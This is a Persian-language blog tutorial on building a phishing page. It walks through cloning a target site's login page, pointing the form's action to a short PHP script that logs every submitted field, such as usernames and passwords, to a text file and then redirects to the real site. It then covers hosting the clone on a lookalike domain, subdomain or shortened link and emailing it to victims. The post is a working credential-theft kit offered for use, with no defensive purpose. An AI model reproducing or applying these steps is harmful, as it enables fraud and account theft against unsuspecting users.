ساخت صفحه جعلی یا صفحه فیشینگ
برای جعل یک صفحه وبسایت کافی است :
- وبسایت مورد نظر را در مرورگر باز کنید.
- سپس از منوی مرورگر و یا کلیک راست روی آن صفحه، گزینه Save as را کلیک کنید.
- مطمئن شوید که نوع فایل Html Only باشد. زیرا به فایلهای جاوا اسکریپت و غیره نیازی نداریم. تمام عکسها بصورت لینک از خود وبسایت اصلی خوانده میشوند. (این روش سادهترین راه است. در نظر داشته باشید که با این روش احتمال شناسایی وبسایت جعلی توسط مدیران وبسایت اصلی امکان پذیر است.)
- بعد از ذخیره میتوانید فایل Html مورد نظر را روی مرورگر باز کنید. دقیقا همان صفحه را خواهید دید غیر از آنکه آدرس وبسایت از دستگاه شما است.
- مطمئن شوید که نام فایل را به index تغییر داده باشید. به این ترتیب فایل شما index.html خواهد بود.
- در ریشه یک فایل متنی (txt) اضافه کنید. این فایل برای ذخیره اطلاعات ارسال شده (نام کاربری، رمزعبور و غیره) توسط فرم ورود یا هر فرم دیگر است. مانند list.txt
- در همان مسیر یک فایل جدید اضافه کنید. نوع این فایل php است.
PHP
۱ ۲ ۳ ۴ ۵ ۶ ۷ ۸ ۹ ۱۰ ۱۱ ۱۲ ۱۳ ۱۴ ۱۵ ۱۶ ۱۷ | Header("Location: http://www.TargetDomain.com"); $handle = fopen("list.txt", "a"); foreach($_GET as $variable => $value) { fwrite ($handle, $variable); fwrite ($handle, $value); fwrite ($handle, "rn"); } fwrite ($handle, "rn"); fclose($handle); exit; ?>
|
- این فایل php که همان فایل phishing است را به هر اسمی غیر از phish یا phishing ذخیره کنید. برای نمونه sample.php.
- نوبت فایل index.html است. آن را در ویرایشگری مانند notepad++ باز کنید.
- در کدهای این فایل تگ form را پیدا کنید. میتوانید به کمک دکمههای میانبر Ctrl + F ابزار جستجو را باز کنید و form را پیدا کنید.
- در تگ form، پارامتر action را خواهید دید. Action میگوید که اطلاعات فرم به کدام صفحه ارسال شوند. تنها کاری که باید انجام دهید، جایگزین کردن مسیر داخل دابل کوتیشن Action با نام فایل php تان است. action=”sample.php”
- داخل تگ فرم پارامتر method را پیدا کنید. Method می گوید که اطلاعات چگونه ارسال شوند. دو گزینه برای این پارامتر وجود دارند یکی POST و دیگری GET. در ارسال با POST اطلاعات فرم در بدنه HTTP Request فرستاده میشوند و امنیت این روش بالا است. اما در روش GET اطلاعات فرم در URL ارسال میشوند. مطمئن شوید که گزینه GET را برای پارامتر Method انتخاب کرده باشید.
- فایل را ذخیره کنید.
- در این مرحله نیاز به یک دامنه و یک هاست دارید.
- بعد از خرید دامنه و هاست، dnsهای دامنه را به Name Server هاست تغییر دهید.
- با استفاده از FTP، SFTP یا کنترل پنلهای موجود، فایلهایتان را روی هاستتان آپلود کنید.
کافی است نام دامنه ثبت شده شما نزدیک به دامنه وبسایت هدف باشد یا از سرویسهای کوتاه کننده لینک استفاده کنید. همچنین میتوانید در دامنه خودتان یک Sub Damian به نام دامنه وبسایت هدف بسازید تا صفحه جعلی شما در آن آدرس باز شود. برای مثال وبسایت هدف http://www.examlpe.com است و دامنه ثبت شما sample.com میباشد. میتوانید یکSub Damian با نام ex بسازید و مسیر فایلهای آپلود شده را به آن متصل کنید. در اینصورت صفحه جعلی شما در آدرس ex.sample.com نمایش داده میشود.
تمام شد. تنها کاری که باید انجام دهید ارسال لینک صفحه جعلی به ایمیل کاربران دیگر و درخواست از آنها برای ورد به حساب کاربریشان است. اگر کاربری اطلاعات خود را از طریق صفحه فیشینگ شما ارسال کند، آن اطلاعات در فایل list.txt ذخیره میشوند.
آموزش...
ما را در سایت آموزش دنبال می کنید
برچسب : نویسنده : askaniiifarhad8553 بازدید : 135 تاريخ : پنجشنبه 15 اسفند 1398 ساعت: 17:04